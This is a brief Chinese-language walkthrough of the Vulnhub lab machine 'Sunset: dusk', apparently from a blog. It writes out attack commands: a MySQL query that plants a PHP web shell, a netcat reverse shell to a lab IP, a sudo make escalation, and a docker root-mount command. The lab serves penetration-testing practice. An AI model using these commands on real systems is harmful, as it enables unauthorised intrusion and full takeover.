Sunset: dusk: Vulnhub Walkthrough
2024-09-06 19:05:33
靶机链接:
https://www.vulnhub.com/entry/sunset-dusk,404/
主机IP扫描:
IP端口扫描:
21 端口 pyftpdlib 1.5.5 版本漏洞
25 端口 Postfix 账户枚举
80 Apache httpd 2.4.38 版本漏洞,目录枚举
3306 mysql MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1 版本漏洞,暴力破解
8080 http PHP cli server 5.5 版本漏洞,目录枚举
80 HTTP目录枚举,无结果
MySQL爆破结果
尝试用MySQL into outfile 写一句话木马
select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/pentest.php';
反向shell
http://10.10.203.20:8080/pentest.php?cmd=nc%20-e%20/bin/bash%2010.10.203.14%201234
提权操作
COMMAND='/bin/sh'
sudo -u dusk make -s --eval=$'x:\n\t-'"$COMMAND"
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
OVER!!
最新文章
- Ceph剖析:消息处理
- CSS样式重置
- 项目中的web api知识总结
- 一个简单驱动的makefile
- java内存泄露的理解与解决(转)
- myeclipse2014破解过程
- intel simd 资料
- nginx日志切割
- VIM技巧:翻页
- leetcode:Roman to Integer(罗马数字转化为罗马数字)
- LVS+DR源码安装
- 使用 system.io.filesysteminfo 来查找文件。
- [JZOJ3588]【中山市选2014】J语言(表达式解析+栈)
- 24_ajax请求_使用axios
- velocity 框架
- python中的三次握手以及四次挥手
- Android友盟推送
- 把文件(项目)上传到Git@OSC
- C#学习笔记(十一):类和对象
- 重学Verilog(3)——参数化模块
热门文章
- Qt Installer Framework翻译(4)
- 源码详解系列(七) ------ 全面讲解logback的使用和源码
- Python学习,第一课 - 基础学习
- C++ 一篇搞懂多态的实现原理
- 同一个环境同时使用python2和python3的方法
- 安装pycharm后设置idle为默认打开方式(idle.bat)图标“变异”为未知bug
- redis缓存数据库及Python操作redis
- IdentityServer4身份认证授权入门
- screen配置窗口显示
- Flutter 入门 --- 内部分享